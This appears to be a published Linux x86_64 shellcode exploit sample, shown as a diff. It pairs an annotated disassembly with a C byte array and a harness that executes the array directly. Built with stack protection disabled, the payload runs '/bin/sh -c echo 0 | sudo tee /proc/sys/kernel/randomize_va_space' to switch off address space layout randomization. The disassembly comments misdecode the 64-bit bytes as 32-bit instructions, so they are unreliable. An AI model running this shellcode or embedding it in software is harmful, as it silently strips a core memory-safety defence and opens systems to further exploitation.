+	ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
+
+	Author : Kağan Çapar
+	contact: kagancapar@gmail.com
+	shellcode len : 93 bytes
+	compilation: gcc -fno-stack-protector -z execstack [.c] -o []
+	
+	Test:
+	run shellcode (./aslr etc.)
+	check : cat /proc/sys/kernel/randomize_va_space
+	you will see "0"
+
+	Assembly:
+
+	global _start           
+	section .ASLR
+	_start:
+
+	#6A3B              push byte +0x3b
+	#58                pop eax
+	#99                cdq
+	#48                dec eax
+	#BB2F62696E        mov ebx,0x6e69622f
+	#2F                das
+	#7368              jnc 0x75
+	#005348            add [ebx+0x48],dl
+	#89E7              mov edi,esp
+	#682D630000        push dword 0x632d
+	#48                dec eax
+	#89E6              mov esi,esp
+	#52                push edx
+	#E836000000        call 0x56
+	#6563686F          arpl [gs:eax+0x6f],bp
+	#2030              and [eax],dh
+	#207C2073          and [eax+0x73],bh
+	#7564              jnz 0x90
+	#6F                outsd
+	#20746565          and [ebp+0x65],dh
+	#202F              and [edi],ch
+	#7072              jo 0xa7
+	#6F                outsd
+	#632F              arpl [edi],bp
+	#7379              jnc 0xb3
+	#732F              jnc 0x6b
+	#6B65726E          imul esp,[ebp+0x72],byte +0x6e
+	#656C              gs insb
+	#2F                das
+	#7261              jc 0xa6
+	#6E                outsb
+	#646F              fs outsd
+	#6D                insd
+	#697A655F76615F    imul edi,[edx+0x65],dword 0x5f61765f
+	#7370              jnc 0xc2
+	#61                popa
+	#636500            arpl [ebp+0x0],sp
+	#56                push esi
+	#57                push edi
+	#48                dec eax
+	#89E6              mov esi,esp
+	#0F05              syscall
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char ASLR[] = \
+"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
+"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
+"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
+"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
+"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
+"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
+"\xe6\x0f\x05";
+
+int main()
+{
+	printf("Shellcode len: %d\n", strlen(ASLR));
+	
+	int (*ret)() = (int(*)())ASLR;
+	
+	ret();
+	
+}